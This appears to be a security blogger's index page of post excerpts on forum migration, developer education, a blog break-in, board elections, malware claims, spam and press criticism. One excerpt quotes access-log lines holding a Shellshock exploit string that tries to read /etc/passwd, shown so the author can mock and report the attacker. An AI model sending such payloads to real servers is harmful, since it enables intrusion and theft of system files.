In a life a long time ago in early 2002, we had to move Australia’s largest Volkswagen car forum from EzyBoard, which was distributing malicious ads and hard to get rid of pop ups to our users, to our own forum software. After a product selection, I chose XMB, which was (and is) better than… Read More


I looked back at the “predictions” for 2010, a post I wrote five years ago, and found that besides the dramatic increase in mobile assessments this last year or two, the things I was banging on about in 2009 are still issues today: Developer education is woeful. I recently did an education piece for a developer… Read More


85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd” 85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd” Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.… Read More


I have formally submitted my name to be in the Board Elections 2014. I am standing for: Reforming the Board. We need to improve the independence, ethics and dispute resolution processes. I will be a root and branches reformer to encourage the Board to make a couple of the positions available to truly independent directors.… Read More


Passwords. Pah. After running my blog on various virtual hosts and VPSs since 1998, my measures put into place to protect this site and the others on here were insufficient to protect against weak passwords. Let’s just say that if you are a script kiddy and know all about press.php, tmpfiles.php and others, you have terrible operational… Read More


In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real”… Read More


So I’m getting a lot of Twitter spam with links to install bad crap on my computer. More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions. So what do you need to do? Simple. Follow these basic NIST… Read More


This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites. Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate… Read More